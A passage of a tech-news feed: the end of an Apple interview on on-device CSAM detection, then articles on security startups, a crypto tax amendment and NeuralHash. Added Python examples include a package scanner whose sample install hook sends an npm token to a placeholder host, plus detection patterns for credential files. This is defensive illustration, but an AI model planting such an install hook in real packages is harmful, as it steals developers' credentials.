But even in the case where we’re talking about some attempt to change the system, it has a number of protections built in that make it not very useful for trying to identify individuals holding specifically objectionable images. The hash list is built into the operating system, we have one global operating system and don’t have the ability to target updates to individual users, and so hash lists will be shared by all users when the system is enabled. And secondly, the system requires the threshold of images to be exceeded, so trying to seek out even a single image from a person’s device or set of people’s devices won’t work because the system simply does not provide any knowledge to Apple for single photos stored in our service. And then, thirdly, the system has built into it a stage of manual review where, if an account is flagged with a collection of illegal CSAM material, an Apple team will review that to make sure that it is a correct match of illegal CSAM material prior to making any referral to any external entity. And so the hypothetical requires jumping through a lot of hoops, including having Apple change its internal process to refer material that is not illegal like known CSAM is, and we don’t believe that there’s a basis on which people will be able to make that request in the US. And the last point that I would just add is that it does still preserve user choice: if a user does not like this kind of functionality, they can choose not to use iCloud Photos, and if iCloud Photos is not enabled no part of the system is functional.

So if iCloud Photos is disabled, the system does not work, which is the public language in the FAQ. I just wanted to ask specifically, when you disable iCloud Photos, does this system continue to create hashes of your photos on device, or is it completely inactive at that point?

If users are not using iCloud Photos, NeuralHash will not run and will not generate any vouchers. CSAM detection is a neural hash being compared against a database of the known CSAM hashes that are part of the operating system image. None of that piece, nor any of the additional parts including the creation of the safety vouchers or the uploading of vouchers to iCloud Photos is functioning if you’re not using iCloud Photos. 

In recent years, Apple has often leaned into the fact that on-device processing preserves user privacy. And in nearly every previous case I can think of that’s true. Scanning photos to identify their content and allow me to search them, for instance. I’d rather that be done locally and never sent to a server. However, in this case, it seems like there may actually be a sort of anti-effect in that you’re scanning locally, but for external use cases, rather than scanning for personal use — creating a ‘less trust’ scenario in the minds of some users. Add to this that every other cloud provider scans it on their servers, and the question becomes why should this implementation, being different from most others, engender more trust in the user rather than less?

I think we’re raising the bar, compared to the industry standard way to do this. Any sort of server side algorithm that’s processing all users’ photos is putting that data at more risk of disclosure and is, by definition, less transparent in terms of what it’s doing on top of the user’s library. So, by building this into our operating system, we gain the same properties that the integrity of the operating system provides already across so many other features, the one global operating system that’s the same for all users who download it and install it, and so in one property it is much more challenging, even how it would be targeted to an individual user. On the server side that’s actually quite easy — trivial. To be able to have some of the properties and building it into the device and ensuring it’s the same for all users with the features enabled gives a strong privacy property.

Secondly, you point out how use of on device technology is privacy preserving, and in this case, that’s a representation that I would make to you, again. That it’s really the alternative to where users’ libraries have to be processed on a server that is less private.

The things that we can say with this system is that it leaves privacy completely undisturbed for every other user who’s not into this illegal behavior. Apple gains no additional knowledge about any user’s cloud library. No user’s iCloud Library has to be processed as a result of this feature. Instead what we’re able to do is to create these cryptographic safety vouchers. They have mathematical properties that say Apple will only be able to decrypt the contents or learn anything about the images and users specifically that collect photos that match illegal, known CSAM hashes, and that’s just not something anyone can say about a cloud processing scanning service, where every single image has to be processed in a clear decrypted form and run by routine to determine who knows what? At that point it’s very easy to determine anything you want [about a user’s images] versus our system only what is determined to be those images that match a set of known CSAM hashes that came directly from NCMEC and other child safety organizations.

Can this CSAM detection feature stay holistic when the device is physically compromised? Sometimes cryptography gets bypassed locally, somebody has the device in hand — are there any additional layers there?

I think it’s important to underscore how very challenging and expensive and rare this is. It’s not a practical concern for most users though it’s one we take very seriously, because the protection of data on the device is paramount for us. And so if we engage in the hypothetical where we say that there has been an attack on someone’s device: that is such a powerful attack that there are many things that that attacker could attempt to do to that user. There’s a lot of a user’s data that they could potentially get access to. And the idea that the most valuable thing that an attacker — who’s undergone such an extremely difficult action as breaching someone’s device — was that they would want to trigger a manual review of an account doesn’t make much sense. 

Because, let’s remember, even if the threshold is met and we have some vouchers that are decrypted by Apple, the next stage is a manual review to determine if that account should be referred to NCMEC or not, and that is something that we want to only occur in cases where it’s a legitimate high value report. We’ve designed the system in that way, but if we consider the attack scenario you brought up, I think that’s not a very compelling outcome to an attacker.

Why is there a threshold of images for reporting, isn’t one piece of CSAM content too many?

We want to ensure that the reports that we make to NCMEC are high value and actionable, and one of the notions of all systems is that there’s some uncertainty built into whether or not that image matched. And so the threshold allows us to reach that point where we expect a false reporting rate for review of one in 1 trillion accounts per year. So, working against the idea that we do not have any interest in looking through users’ photo libraries outside those that are holding collections of known CSAM, the threshold allows us to have high confidence that those accounts that we review are ones that, when we refer to NCMEC, law enforcement will be able to take up and effectively investigate, prosecute and convict.

#apple, #apple-inc, #apple-photos, #china, #cloud-applications, #cloud-computing, #cloud-services, #computing, #cryptography, #encryption, #european-union, #head, #icloud, #ios, #iphone, #law-enforcement, #operating-system, #operating-systems, #privacy, #private, #siri, #software, #united-states, #webmail

Siga secures $8.1M Series B to prevent cyberattacks on critical infrastructure

Siga OT Solutions, an Israeli cybersecurity startup that helps organizations secure their operations by monitoring the raw electric signals of critical industrial assets, has raised $8.1 million in Series B funding.

Siga says its SigaGuard technology, used by Israel’s critical water facilities and the New York Power Authority, is unique in that rather than monitoring the operational network, it uses machine learning and predictive analysis to “listen” to Level 0 signals. These are typically made up of components and sensors that receive electrical signals, rather than protocols or data packets that can be manipulated by hackers.

By monitoring Level 0, which Siga describes as the “richest and most reliable level of process data within any operational environment,” the company can detect cyberattacks on the most critical and vulnerable physical assets of national infrastructures. This, it claims, ensures operational resiliency even when hackers are successful in manipulating the logic of industrial control system (ICS) controllers.

Amir Samoiloff, co-founder and CEO of Siga, says: “Level 0 is becoming the major axis in the resilience and integrity of critical national infrastructures worldwide and securing this level will become a major element in control systems in the coming years.”

The company’s latest round of funding — led by PureTerra Ventures, with investment from Israeli venture fund SIBF, Moore Capital, and Phoenix Contact — comes amid an escalation in attacks against operational infrastructure. Israel’s water infrastructure was hit by three known cyberattacks in 2020 and these were followed by an attack on the water system of a city in Florida that saw hackers briefly increase the amount of sodium hydroxide in Oldsmar’s water treatment system. 

The $8.1 million investment lands three years after the startup secured $3.5 million in Series A funding. The company said it will use the funding to accelerate its sales and strategic collaborations internationally, with a focus on North America, Europe, Asia, and the United Arab Emirates. 

#articles, #asia, #computer-security, #cryptography, #cyberattack, #cybercrime, #cybersecurity-startup, #cyberwarfare, #data-security, #energy, #europe, #florida, #israel, #machine-learning, #north-america, #nozomi-networks, #phoenix, #ransomware, #security, #united-arab-emirates

Crypto community slams ‘disastrous’ new amendment to Biden’s big infrastructure bill

Biden’s major bipartisan infrastructure plan struck a rare chord of cooperation between Republicans and Democrats, but changes it proposes to cryptocurrency regulation are tripping up the bill.

The administration intends to pay for $28 billion of its planned infrastructure spending by tightening tax compliance within the historically under-regulated arena of digital currency. That’s why cryptocurrency is popping up in a bill that’s mostly about rebuilding bridges and roads.

The legislation’s vocal critics argue that the bill’s effort to do so is slapdash, particularly a bit that would declare anyone “responsible for and regularly providing any service effectuating transfers of digital assets” to be a broker, subject to tax reporting requirements.

While that definition might be more straightforward in a traditional corner of finance, it could force cryptocurrency developers, companies and even anyone mining digital currencies to somehow collect and report information on users, something that by design isn’t even possible in a decentralized financial system.

Now, a new amendment to the critical spending package is threatening to make matters even worse.

Unintended consequences

In a joint letter about the bill’s text, Square, Coinbase, Ribbit Capital and other stakeholders warned of “financial surveillance” and unintended impacts for cryptocurrency miners and developers. The Electronic Frontier Foundation and Fight for the Future, two privacy-minded digital rights organizations, also slammed the bill.

Following the outcry from the cryptocurrency community, a pair of influential senators proposed an amendment to clarify the new reporting rules. Finance Committee Chairman Ron Wyden (D-OR) pushed back against the bill, proposing an amendment with fellow finance committee member Pat Toomey (R-PA) that would modify the bill’s language.

The amendment would establish that the new reporting “does not apply to individuals developing block chain technology and wallets,” removing some of the bill’s ambiguity on the issue.

“By clarifying the definition of broker, our amendment will ensure non-financial intermediaries like miners, network validators, and other service providers—many of whom don’t even have the personal-identifying information needed to file a 1099 with the IRS—are not subject to the reporting requirements specified in the bipartisan infrastructure package,” Toomey said.

Wyoming Senator Cynthia Lummis also threw her support behind the Toomey and Wyden amendment, as did Colorado Governor Jared Polis.

Picking winners and losers

The drama doesn’t stop there. With negotiations around the bill ongoing — the text could be finalized over the weekend — a pair of senators proposed a competing amendment that isn’t winning any fans in the crypto community.

That amendment, from Sen. Rob Portman (R-OH) and Mark Warner (D-VA), would exempt traditional cryptocurrency miners who participate in energy-intensive “proof of work” systems from new financial reporting requirements, while keeping those rules in place for those using a “proof of stake” system. Portman worked with the Treasury Department to author the cryptocurrency portion of the original infrastructure bill.

Rather than requiring an investment in computing hardware (and energy bills) capable of solving increasingly complex math problems, proof of stake systems rely on participants taking a financial stake in a given project, locking away some of the cryptocurrency to generate new coins.

Proof of stake is emerging as an attractive, climate-friendlier alternative that could reduce the need for heavy computing and huge amounts of energy required for proof of work mining. That makes it all the more puzzling that the latest amendment would specifically let proof of work mining off the hook.

Some popular digital currencies like Cardano are already built on proof of stake. Ethereum, the second biggest cryptocurrency, is in the process of migrating from a proof of work system to proof of stake to help scale its system and reduce fees. Bitcoin is the most notable digital currency that relies on proof of work.

The Warner-Portman amendment is being touted as a “compromise” but it’s not really halfway between the Wyden-Toomey amendment and the existing bill — it just introduces new problems that many crypto advocates view as a fresh existential threat to their work. Prominent members of the crypto community including Square founder and Bitcoin booster Jack Dorsey have thrown their support behind the Wyden-Lummis-Toomey amendment while slamming the second proposal as misguided and damaging.

Unfortunately for the crypto community — and the promise of the proof of stake model — the White House is apparently throwing its weight behind the Warner-Portman amendment, though that could change as eleventh hour negotiations continue.

#biden, #bitcoin, #blockchain, #broker, #cardano, #chairman, #coinbase, #cryptocurrencies, #cryptography, #democrats, #digital-currency, #electronic-frontier-foundation, #energy, #ethereum, #finance, #government, #internal-revenue-service, #jack-dorsey, #proof-of-stake, #proof-of-work, #republicans, #ribbit-capital, #ron-wyden, #tc, #white-house

Apple says it will begin scanning iCloud Photos for child abuse images

Later this year, Apple will roll out a technology that will allow the company to detect and report known child sexual abuse material to law enforcement in a way it says will preserve user privacy.

Apple told TechCrunch that the detection of child sexual abuse material (CSAM) is one of several new features aimed at better protecting the children who use its services from online harm, including filters to block potentially sexually explicit photos sent and received through a child’s iMessage account. Another feature will intervene when a user tries to search for CSAM-related terms through Siri and Search.

Most cloud services — Dropbox, Google, and Microsoft to name a few — already scan user files for content that might violate their terms of service or be potentially illegal, like CSAM. But Apple has long resisted scanning users’ files in the cloud by giving users the option to encrypt their data before it ever reaches Apple’s iCloud servers.

Apple said its new CSAM detection technology — NeuralHash — instead works on a user’s device, and can identify if a user uploads known child abuse imagery to iCloud without decrypting the images until a threshold is met and a sequence of checks to verify the content is cleared.

News of Apple’s effort leaked Wednesday when Matthew Green, a cryptography professor at Johns Hopkins University, revealed the existence of the new technology in a series of tweets. The news was met with some resistance from security experts and privacy advocates, but also from users who are accustomed to an approach to security and privacy that most other companies don’t share.

Apple is trying to calm fears by baking in privacy through multiple layers of encryption, fashioned in a way that requires multiple steps before it ever makes it into the hands of Apple’s final manual review.

NeuralHash will land in iOS 15 and macOS Monterey, slated to be released in the next month or two, and works by converting the photos on a user’s iPhone or Mac into a unique string of letters and numbers, known as a hash. Any time you modify an image slightly, it changes the hash and can prevent matching. Apple says NeuralHash tries to ensure that identical and visually similar images — such as cropped or edited images — result in the same hash.
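The contrast drawn above, between an ordinary hash that changes completely on any edit and a perceptual hash that tolerates small changes, is shown below in an added example. It is not Apple’s code and not NeuralHash (a learned, neural-network-based hash); it uses the classic average hash over a constructed 8x8 grayscale image and compares it with SHA-256 over the same pixel bytes. The image data, function names and the gradient comparison image are all constructed here for illustration.

```python
import hashlib

# Constructed 8x8 grayscale "image": a bright square on a dark border.
BASE_IMAGE = [
    [20, 20, 20, 20, 20, 20, 20, 20],
    [20, 200, 200, 200, 200, 200, 200, 20],
    [20, 200, 200, 200, 200, 200, 200, 20],
    [20, 200, 200, 200, 200, 200, 200, 20],
    [20, 200, 200, 200, 200, 200, 200, 20],
    [20, 200, 200, 200, 200, 200, 200, 20],
    [20, 200, 200, 200, 200, 200, 200, 20],
    [20, 20, 20, 20, 20, 20, 20, 20],
]

# Constructed unrelated image: a top-to-bottom brightness gradient (0..252).
GRADIENT_IMAGE = [[(r * 8 + c) * 4 for c in range(8)] for r in range(8)]


def average_hash(pixels):
    """64-bit perceptual hash: one bit per pixel, set when the pixel is above the mean.

    Small global changes (brightness, mild noise) move few or no bits, so
    visually similar images land close together in Hamming distance.
    """
    flat = [p for row in pixels for p in row]
    mean = sum(flat) / len(flat)
    bits = 0
    for p in flat:
        bits = (bits << 1) | (1 if p > mean else 0)
    return bits


def hamming_distance(a, b):
    """Number of differing bits between two hashes."""
    return bin(a ^ b).count("1")


def sha256_hex(pixels):
    """Cryptographic hash of the raw pixel bytes: any change alters the digest."""
    return hashlib.sha256(bytes(p for row in pixels for p in row)).hexdigest()


def brighten(pixels, delta):
    """Return a copy of the image with every pixel raised by delta (clamped to 255)."""
    return [[min(255, p + delta) for p in row] for row in pixels]


def set_pixel(pixels, row, col, value):
    """Return a copy of the image with a single pixel replaced."""
    copy = [r[:] for r in pixels]
    copy[row][col] = value
    return copy


def compare(img_a, img_b):
    """Report how the two hash families judge the pair of images."""
    return {
        "perceptual_distance": hamming_distance(average_hash(img_a), average_hash(img_b)),
        "sha256_equal": sha256_hex(img_a) == sha256_hex(img_b),
    }


if __name__ == "__main__":
    # Brightening every pixel: SHA-256 differs, perceptual hash is identical.
    print("brightened:", compare(BASE_IMAGE, brighten(BASE_IMAGE, 5)))
    # One altered pixel: perceptual hash moves by a single bit.
    print("one pixel:", compare(BASE_IMAGE, set_pixel(BASE_IMAGE, 0, 0, 255)))
    # An unrelated picture lands far away (32 of 64 bits differ here).
    print("unrelated:", compare(BASE_IMAGE, GRADIENT_IMAGE))
```

The tolerance that lets a perceptual hash survive cropping or re-encoding is also why a matching system cannot treat a single near-match as proof: a small Hamming distance is evidence, not identity, which is the reason the article goes on to describe a threshold and a manual review stage.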

Before an image is uploaded to iCloud Photos, those hashes are matched on the device against a database of known hashes of child abuse imagery, provided by child protection organizations like the National Center for Missing & Exploited Children (NCMEC) and others. NeuralHash uses a cryptographic technique called private set intersection to detect a hash match without revealing what the image is or alerting the user.

The results are uploaded to Apple but cannot be read on their own. Apple uses another cryptographic principle called threshold secret sharing that allows it only to decrypt the contents if a user crosses a threshold of known child abuse imagery in their iCloud Photos. Apple would not say what that threshold was, but said — for example — that if a secret is split into a thousand pieces and the threshold is ten images of child abuse content, the secret can be reconstructed from any of those ten images.

It’s at that point Apple can decrypt the matching images, manually verify the contents, disable a user’s account and report the imagery to NCMEC, which is then passed to law enforcement. Apple says this process is more privacy mindful than scanning files in the cloud as NeuralHash only searches for known and not new child abuse imagery. Apple said that there is a one in one trillion chance of a false positive, but there is an appeals process in place in the event an account is mistakenly flagged.

Apple has published technical details on its website about how NeuralHash works, which have been reviewed by cryptography experts.

But despite the wide support of efforts to combat child sexual abuse, there is still a component of surveillance that many would feel uncomfortable handing over to an algorithm, and some security experts are calling for more public discussion before Apple rolls the technology out to users.

A big question is why now and not sooner. Apple said its privacy-preserving CSAM detection did not exist until now. But companies like Apple have also faced considerable pressure from the U.S. government and its allies to weaken or backdoor the encryption used to protect their users’ data to allow law enforcement to investigate serious crime.

Tech giants have refused efforts to backdoor their systems, but have met resistance to efforts that would further shut out government access. Although some categories of iCloud data are end-to-end encrypted so that even Apple cannot access them, most iCloud data, including device backups, is encrypted with keys Apple holds; Reuters reported last year that Apple dropped a plan to end-to-end encrypt users’ full phone backups to iCloud after the FBI complained that it would harm investigations.

The news of Apple’s new CSAM detection tool, announced without public discussion, also sparked concerns that the technology could be abused: an attacker could flood a victim with child abuse imagery so that the victim’s account gets flagged and shut down. Apple downplayed the concerns, saying its manual review step would examine the evidence for signs of such misuse.

Apple said NeuralHash will roll out in the U.S. first, but would not say if, or when, it would be rolled out internationally. Until recently, companies like Facebook were forced to switch off their child abuse detection tools across the European Union after a change in EU privacy rules inadvertently banned the practice. Apple said the feature is technically optional, in that you don’t have to use iCloud Photos, but it is a requirement if you do. After all, your device belongs to you, but Apple’s cloud does not.

#apple, #apple-inc, #cloud-applications, #cloud-services, #computing, #cryptography, #encryption, #facebook, #federal-bureau-of-investigation, #icloud, #ios, #iphone, #johns-hopkins-university, #law-enforcement, #macos, #privacy, #security, #technology, #u-s-government, #united-states, #webmail

Checkmarx acquires open source supply chain security startup Dustico

Checkmarx, an Israeli provider of static application security testing (AST), has acquired open-source supply chain security startup Dustico for an undisclosed sum.

Founded in 2020, Dustico provides a dynamic source-code analysis platform that employs machine learning to detect malicious code and backdoors in software supply chains.

The acquisition will see Checkmarx combine its AST capabilities with Dustico’s behavioral analysis technology to give customers a consolidated view into the risk and reputation of open-source packages, and as a result, a more comprehensive approach to preventing supply chain attacks. 

The deal comes amid a sharp rise in supply chain attacks, in which threat actors slip malicious code into a trusted piece of software or hardware. Last December, it was revealed that Russian hackers had breached software firm SolarWinds to plant malicious code in its IT management tool Orion. This allowed the hackers — later identified as Russia’s Foreign Intelligence Service (SVR) — to access as many as 18,000 networks that used the Orion software.

Dustico’s technology, which is similar to that offered by Sonatype, analyses open source packages using a three-pronged approach. First, it factors in trust, providing visibility into the credibility of package providers and individual contributors in the open-source community; then it examines the health of packages to determine their level of maintenance. Finally, Dustico’s behavioral analysis engine inspects the package and looks for malicious code hiding within it, including backdoors, ransomware, multi-stage attacks and trojans.
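What a three-pronged check of that kind looks like in practice, as an added example that is neither Dustico’s nor Checkmarx’s code: a small scan of an npm-style package that scores trust (who publishes it), health (how it is maintained) and behaviour (what runs at install time). The package manifest, the script contents and the registry metadata fields below are all constructed for the demo, and the thresholds are assumptions; a real engine would pull the metadata from the registry and run the scripts in a sandbox rather than pattern-match them.

```python
# Added example, not Dustico's or Checkmarx's code: a small three-pronged scan of an
# npm-style package (trust, health, behaviour). Every input below is constructed for the
# demo; the registry metadata fields and the thresholds are assumptions for illustration.
import re
from datetime import date

INSTALL_HOOKS = {"preinstall", "install", "postinstall", "prepare"}

# Behavioural indicators that a backdoor in an install script commonly shows.
BEHAVIOUR_PATTERNS = {
    "eval of decoded blob": re.compile(r"eval\s*\(\s*(?:Buffer\.from|atob)\s*\("),
    "spawns a process": re.compile(r"require\(\s*['\"]child_process['\"]\s*\)"),
    "network access": re.compile(r"require\(\s*['\"](?:https?|net|dgram|dns)['\"]\s*\)"),
    "reads secrets": re.compile(r"process\.env|\.npmrc|\.ssh/|\.aws/credentials"),
}


def check_trust(meta):
    """Who publishes the package: a brand-new sole maintainer is weaker than a known team."""
    findings = []
    if len(meta["maintainers"]) == 1:
        findings.append("trust: single maintainer")
    newest = min(m["account_age_days"] for m in meta["maintainers"])
    if newest < 30:
        findings.append(f"trust: maintainer account only {newest} days old")
    return findings


def check_health(meta, today):
    """How the package is maintained: release cadence and sudden ownership changes."""
    findings = []
    stale_days = (today - meta["last_publish"]).days
    if meta["versions"] >= 5 and stale_days > 365:
        findings.append(f"health: no release in {stale_days} days")
    if meta.get("ownership_changed_days_ago", 10**9) < 30 and stale_days < 7:
        findings.append("health: ownership changed and new version published within a month")
    return findings


def check_behaviour(manifest, files):
    """What the package does on install: lifecycle hooks plus the scripts they run."""
    findings = []
    scripts = manifest.get("scripts", {})
    hooked = sorted(INSTALL_HOOKS & set(scripts))
    if hooked:
        findings.append(f"behaviour: install hooks {hooked}")
    for name, source in files.items():
        for label, pattern in BEHAVIOUR_PATTERNS.items():
            if pattern.search(source):
                findings.append(f"behaviour: {label} in {name}")
    # Suspicious code reachable from an install hook is the classic backdoor shape.
    hook_targets = {s.split()[-1] for s in (scripts[h] for h in hooked) if s.split()}
    for f in sorted(hook_targets & set(files)):
        if any(p.search(files[f]) for p in BEHAVIOUR_PATTERNS.values()):
            findings.append(f"behaviour: suspicious code runs at install time via {f}")
    return findings


def assess(manifest, files, meta, today):
    """Combined findings; an empty list means none of the three prongs raised anything."""
    return check_trust(meta) + check_health(meta, today) + check_behaviour(manifest, files)


# Constructed sample package: a "preinstall" hook running an obfuscated, phoning-home script.
SAMPLE_MANIFEST = {"name": "left-padd", "version": "1.0.1",
                   "scripts": {"preinstall": "node setup.js", "test": "mocha"}}
SAMPLE_FILES = {
    "setup.js": 'const h = require("https");\n'
                'eval(Buffer.from("Y29uc29sZS5sb2coMSk=", "base64").toString());\n'
                'h.get("https://example.invalid/?t=" + process.env.NPM_TOKEN);\n',
    "index.js": "module.exports = (s, n) => s.padStart(n);\n",
}
SAMPLE_META = {"maintainers": [{"name": "newdev", "account_age_days": 3}],
               "versions": 2, "last_publish": date(2021, 8, 3),
               "ownership_changed_days_ago": 5}
```

`assess(SAMPLE_MANIFEST, SAMPLE_FILES, SAMPLE_META, date(2021, 8, 5))` raises findings on all three prongs. None of them is proof on its own (plenty of legitimate packages have install hooks or a single maintainer), which is why the prongs are combined into a reputation score rather than a block/allow verdict.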

This insight, coupled with vulnerability results from Checkmarx’s AST solutions, aims to give organizations and developers greater insights for managing the risks associated with open-source and the supply chains dependent on them, according to the two companies.

“We’re thrilled to welcome Dustico and its team to Checkmarx as the Israeli tech ecosystem continues to push the boundaries of cybersecurity innovation and talent,” said Emmanuel Benzaquen, CEO of Checkmarx. “Blending Dustico’s differentiated approach to open-source analysis with Checkmarx’s security testing capabilities will bring disruptive value to our customers as they manage the challenges with securing software supply chains.”

The acquisition of Dustico comes after Checkmarx was bought by private equity firm Hellman & Friedman at a valuation of $1.15 billion in March 2020. Prior to this, in 2015, the company was sold to Insight Partners with an $84 million investment. 

#backdoor, #ceo, #checkmarx, #computer-security, #computing, #cryptography, #cybercrime, #cyberwarfare, #developer, #hellman-friedman, #insight-partners, #ma, #machine-learning, #security, #software, #solarwinds, #supply-chain, #supply-chain-attack, #supply-chain-management, #united-states

Tenderly raises $15.3M to help Ethereum developers ship decentralized apps faster

Blockchain infrastructure startups are heating up as industry fervor brings more developers and users to a space that still feels extremely young despite a heavy institutional embrace of the crypto space in 2021.

The latest crypto startup to court the attention of venture capitalists is Tenderly, which builds a developer platform for Ethereum devs to monitor and test the smart contracts that power their decentralized apps. Tenderly CEO Andrej Bencic tells TechCrunch his startup has closed a $15.3 million Series A funding round led by Accel with additional participation from existing investors. The Belgrade startup had already raised a $3.3 million seed round earlier this year led by Point Nine Capital.

The startup’s aim to date has been ensuring fledgling blockchain developers aren’t left finding out about contract errors only when users discover issues and complain, instead allowing developers to discover these bugs proactively. While the company’s Visual Debugger is already used by “tens of thousands” of Ethereum developers, Tenderly hopes to continue building out its toolset to help more developers build on Ethereum networks without the headaches and irregularities they have had to deal with so far.

“Tenderly, from its inception, has been a solution to one of our own problems,” Bencic tells TechCrunch. “We wanted to make it as easy as possible to observe and extract information from Ethereum and the adjacent networks.”

Bencic hopes the company’s product can help developers get their products out more quickly without compromising on usability.

To date, the majority of Tenderly’s customers have been relatively small startup efforts aiming to tap into the exciting world of blockchain-based computing with a particular focus on decentralized finance. Tenderly itself is a small company with its team of 14 based in Serbia. Bencic says this funding will help the company expand its global footprint and build out engineering and business hires in other geographies.

Climbing cryptocurrency prices have historically aligned pretty closely with developer uptake in the blockchain world so there is some concern that bitcoin and Ethereum’s downward-trending price corrections will lead to less stability in the pipeline of new developers embracing blockchain. That said, volatility is far from unusual to the crypto world and many developers have learned that riding its ebbs and flows is just part of the experience.

“We built most of Tenderly in the bear market, and one thing we saw is that even though you get these concerning prices, people that are excited about the tech are excited about the tech whether the coins are up or down,” Bencic says.

#articles, #blockchain, #blockchains, #cardano, #ceo, #cryptocurrencies, #cryptocurrency, #cryptography, #decentralization, #decentralized-finance, #ethereum, #finance, #joseph-lubin, #point-nine-capital, #smart-contract, #tc, #technology

Noetic Cyber emerges from stealth with $15M led by Energy Impact Partners

Noetic Cyber, a cloud-based continuous cyber asset management and controls platform, has launched from stealth with a Series A funding round of $15 million led by Energy Impact Partners.

The round was also backed by Noetic’s existing investors, TenEleven Ventures and GlassWing Ventures, and brings the total amount of funds raised by the startup to $20 million following a $5 million seed round. Shawn Cherian, a partner at Energy Impact Partners, will join the Noetic board, while Niloofar Razi Howe, a senior operating partner at the investment firm, will join Noetic’s advisory board.

“Noetic is a true market disruptor, offering an innovative way to fix the cyber asset visibility problem — a growing and persistent challenge in today’s threat landscape,” said Howe.

The Massachusetts-based startup claims to be taking a new approach to the cyber asset management problem. Unlike traditional solutions, Noetic is not agent-based, instead using API aggregation and correlation to draw insights from multiple security and IT management tools.

“What makes us different is that we’re putting orchestration and automation at the heart of the solution, so we’re not just showing security leaders that they have problems, but we’re helping them to fix them,” Paul Ayers, CEO and co-founder of Noetic Cyber tells TechCrunch.

Ayers was previously a top exec at PGP Corporation (acquired by Symantec for $370 million) and Vormetric (acquired by Thales for $400 million) and founded Noetic Cyber with Allen Roger and Allen Hadden, who have previously worked at cybersecurity vendors including Authentica, Raptor and Axent. All three were also integral to the development of Resilient Systems, which was acquired by IBM.

“The founding team’s experience in the security, orchestration, automation and response market gives us unique experience and insights to make automation a key pillar of the solution,” Ayers said. “Our model gives you the certainty to make automation possible, the goal is to find and fix problems continuously, getting assets back to a secure state.”

“The development of the technology has been impacted by the current cyber landscape, and the pandemic, as some of the market drivers we’ve seen around the adoption of cloud services, and the increased use of unmanaged devices by remote workers, are driving a great need for accurate cyber asset discovery and management.”

The company, which currently has 20 employees, says it plans to use the newly raised funds to double its headcount by the end of the year, as well as to increase its go-to-market capability in the U.S. and the U.K. to grow its customer base and revenue.

“In terms of technology development, this investment allows us to continue to add development and product management talent to the team to build on our cyber asset management platform,” Ayers said. 

“The beauty of our approach is that it allows us to easily add more applications and use cases on top of our core asset visibility and management model. We will continue to add more connectors to support customer use cases and will be bringing a comprehensive controls package to market later in 2021, as well as a community edition in 2022.”

#api, #cloud-services, #computer-security, #computing, #cryptography, #cybercrime, #cyberwarfare, #data-security, #energy-impact-partners, #funding, #glasswing-ventures, #ibm, #information-technology, #malware, #massachusetts, #partner, #raptor, #resilient-systems, #security, #shawn-cherian, #symantec, #technology-development, #teneleven-ventures, #thales, #united-kingdom, #united-states, #vormetric

Magic lands $27M Series A for its ‘plug and play’ passwordless tech

Magic, a San Francisco-based startup that builds “plug and play” passwordless authentication technology, has raised $27 million in Series A funding.

The round, led by Northzone and with participation from Tiger Global, Volt Capital, Digital Currency Group and CoinFund, comes just over a year after Magic launched from stealth, rebranding from its previous name Fortmatic.

The company, like many others, is on a mission to end traditional password-based authentication. Magic’s flagship SDK, which launched in April 2020, enables developers to implement a variety of passwordless authentication methods with just a few lines of code and integrates with a number of modern frameworks and infrastructures.

Not only does the SDK make it easier for companies and developers to implement passwordless auth methods in their applications, but it could also help to mitigate the expensive fallout that many have to deal with as a result of data breaches.

“This is why the password is so dangerous,” Sean Li, Magic co-founder and CEO tells TechCrunch. “It’s like a Jenga tower right now — a hacker breaching your system can download an entire database of encrypted passwords, and then easily crack them. It’s a huge central point of failure.”

The company recently built out its SDK to add support for WebAuthn, which means it can support hardware security keys such as Yubico’s YubiKeys, as well as biometric Face ID and fingerprint logins on mobile devices.

“It’s less mainstream right now, but we’re making it super simple for developers,” says Li. “This way we can help promote new technologies, and that’s really good for user security and privacy.” 

It’s a bet that seems to be working: Magic has recorded a 13% month-over-month increase in developer signups, and the number of identities secured is growing at a rate of 6% weekly, according to Magic. It’s also secured a number of big-name customers, from crypto news publisher Decrypt to fundraising platform Fairmint.

Wendy Xiao Schadeck, a partner at Northzone said: “We couldn’t be more excited to support Sean and the Magic team as they redefine authentication for the internet from the bottom up, solving a core pain point for developers, users, and companies. 

“It was clear to us that they’re absolutely loved by their customers because the team is so obsessed with serving every single part of the developer journey across several communities. What’s potentially even more exciting is what they will be able to do to empower users and decentralize the identity layer of the web.”

The company now plans to continue to scale its platform and expand its team to meet what Magic describes as “soaring” demand. The startup, which currently has 30 employees that work remotely on a full-time basis, expects to at least double its headcount across all core functions, including product, engineering, design, marketing, finance, people, and operations.

It also hopes to build out the SDK even further; Li says he wants to be able to plug into more kinds of technology, from low-code applications to workflow automations.

“The vision is much bigger than that. We want to be the passport of the internet,” Li adds. 

#access-control, #coinfund, #computer-security, #cryptography, #decrypt, #developer, #digital-currency-group, #finance, #funding, #mobile-devices, #northzone, #password, #plug-and-play, #san-francisco, #security, #tiger-global, #volt-capital, #yubico, #yubikey

Nym gets $6M for its anonymous overlay mixnet to sell privacy as a service

Switzerland-based privacy startup Nym Technologies has raised $6 million, which is being loosely pegged as a Series A round.

Earlier raises included a $2.5M seed round in 2019. The founders also took in grant money from the European Union’s Horizon 2020 research fund during an earlier R&D phase developing the network tech.

The latest funding will be used to continue commercial development of network infrastructure which combines an old idea for obfuscating the metadata of data packets at the transport network layer (Mixnets) with a crypto inspired reputation and incentive mechanism to drive the required quality of service and support a resilient, decentralized infrastructure.

Nym’s pitch is it’s building “an open-ended anonymous overlay network that works to irreversibly disguise patterns in Internet traffic”.

Unsurprisingly, given its attention to crypto mechanics, investors in the Series A have strong crypto ties — and cryptocurrency-related use-cases are also where Nym expects its first users to come from — with the round led by Polychain Capital, with participation from a number of smaller European investors including Eden Block, Greenfield One, Maven11, Tioga, and 1kx.

Commenting in a statement, Will Wolf of Polychain Capital, said: “We’re incredibly excited to partner with the Nym team to further their mission of bringing robust, sustainable and permissionless privacy infrastructure to all Internet users. We believe the Nym network will provide the strongest privacy guarantees with the highest quality of service of any mixnet and thus may become a very valuable piece of core internet infrastructure.”

The Internet’s ‘original sin’ was that core infrastructure wasn’t designed with privacy in mind. The level of complexity involved in mixnets, which shuffle and delay encrypted data packets in order to shield sender-to-recipient metadata from adversaries with a global view of a network, probably seemed like over-engineering back when the web’s scaffolding was being pieced together.

But then came Bitcoin and the crypto boom and, in 2013, the Snowden revelations, which ripped the veil off the NSA’s ‘collect it all’ mantra as Booz Allen Hamilton sub-contractor Edward Snowden risked it all to leak documents on his own (and other) governments’ mass surveillance programs. Suddenly network-level adversaries were front page news. And so was Internet privacy.

